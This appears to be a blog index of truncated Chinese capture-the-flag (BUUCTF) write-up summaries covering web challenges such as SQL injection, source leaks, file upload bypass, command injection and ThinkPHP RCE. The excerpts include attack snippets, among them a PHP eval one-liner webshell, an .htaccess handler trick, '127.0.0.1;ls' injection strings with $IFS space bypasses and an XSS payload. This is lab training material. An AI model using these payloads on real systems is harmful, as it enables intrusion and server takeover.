摘要:
知识点 Apache SSI远程命令执行漏洞 扫描到后台后swp文件泄露,访问一下得到源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012 阅读全文
摘要:
知识点 账户接管漏洞 参考https://www.colabug.com/2020/0204/6940556/amp/ 注册一个空格admin用户 登录成功后再登出 在登录页面选择忘记密码 改密链接会发送到注册邮箱中,这里使用buuoj的内部邮箱 在邮箱中修改密码 使用admin用户和更改后的密码进 阅读全文
摘要:
[BJDCTF 2nd]rsa1 #coding:utf-8 from libnum import * from gmpy2 import * import math e=12990949 p_2_q_2=18378273100717402294789767887365434240878716336 阅读全文
摘要:
知识点 布尔盲注 过滤了 union 无法使用联合查询 or information_schema表不能用 sub substr()函数不能用 concat 不能使用报错注入里的concat('~',select database()) 关于information_schema表被禁后怎么注入可以参 阅读全文
摘要:
爆表脚本 爆表脚本 # -*- coding: utf-8 -*- #version:python3.8 import requests import time '''url = "http://f69281bc-5b5b-4122-9272-40339993c89e.node3.buuoj.cn/ 阅读全文
摘要:
知识点 .git源码泄露 $$导致变量覆盖 扫描到有.git源码泄露,将其下载下来 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $ 阅读全文
摘要:
知识点 .DS_Store泄露,暴露出网站结构 随便输入用户名和密码,登录 使用dirsearch工具扫描网站,发现.DS_Store文件泄露 使用工具下载.DS_Store py -2 ds_store_exp.py http://node3.buuoj.cn:26879/.DS_Store 看到 阅读全文
摘要:
.git文件泄露 上GitHack获取源码 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 原生类构造 payload <?php $a = serialize(new Exception("<script>window. 阅读全文
摘要:
png文件不许上传,尝试上传jpg 修改后缀名为.htaccess,文件内容为 SetHandler application/x-httpd-php 上传一句话木马 <?php eval($_POST[cmd]);?> 失败,换一种方式 <script language='php'>eval($_P 阅读全文
摘要:
查看源码,发现check.php 访问check.php得到源码 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'] 阅读全文
摘要:
主页面是一个留言板 要想发帖得先登录 爆破一下密码,为zhangwei666,登录即可发帖 扫描到后台有.git文件泄露,但是下载下来的源码不齐全 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ 阅读全文
摘要:
知识点 bak源码泄露 php弱类型 题目提示源码泄露dirsearch扫一下后台 #windows下装了python2和python3的情况 py -3 dirsearch.py -u url -e * 得到index.php.bak,删去bak,打开index.php <?php include 阅读全文
摘要:
知识点 web.xml泄露 filter伪协议读取 打开题目,如图所示 尝试点击help发现 发现filename=help.docx有可能可以进行文件读取,尝试 php://filter/read=convert.base64-encode/resource=help.docx 无果,查看wp,知 阅读全文
摘要:
知识点 thinkphp 5.0.23 RCE漏洞 题目 题目提示thinkphp5 构造index.php?s=1报错看看 看到版本号为5.0.23,搜索一波5.0.23漏洞 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload打就是了 阅读全文
摘要:
知识点 php动态函数 反序列化 进去在源码中发现 访问./time.php?source得到源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $th 阅读全文
摘要:
知识点 无参数命令执行 .git源码泄露 参考自php无参数函数利用 php无参数执行命令 [GXYCTF2019]禁止套娃 webscan扫描到有.git文件,使用GitHack下载到源码 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(iss 阅读全文
摘要:
题目如图 尝试127.0.0.1;ls,可以看到有index.php 使用cat命令读取index.php,在网页源代码注释中看到源码 当前文件夹下没有flag文件,猜测可能在父目录中,使用127.0.0.1;ls ../去查看,一直到127.0.0.1;ls ../../../ 可看到flag文件 阅读全文
摘要:
题目提示ping ip 尝试读取flag.php 空格被禁,替换空格的方式有 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 使用$IFS替换空格,再次读取flag.php 使用变量代换读取flag.php payload为 ?ip=127.0.0.1; 阅读全文
摘要:
知识点 php://input php://filter 反序列化 题目如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_c 阅读全文
摘要:
知识点 ssrf nginx配置文件 CVE-2019-10160:urlsplit NFKD 标准化漏洞 题目源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") 阅读全文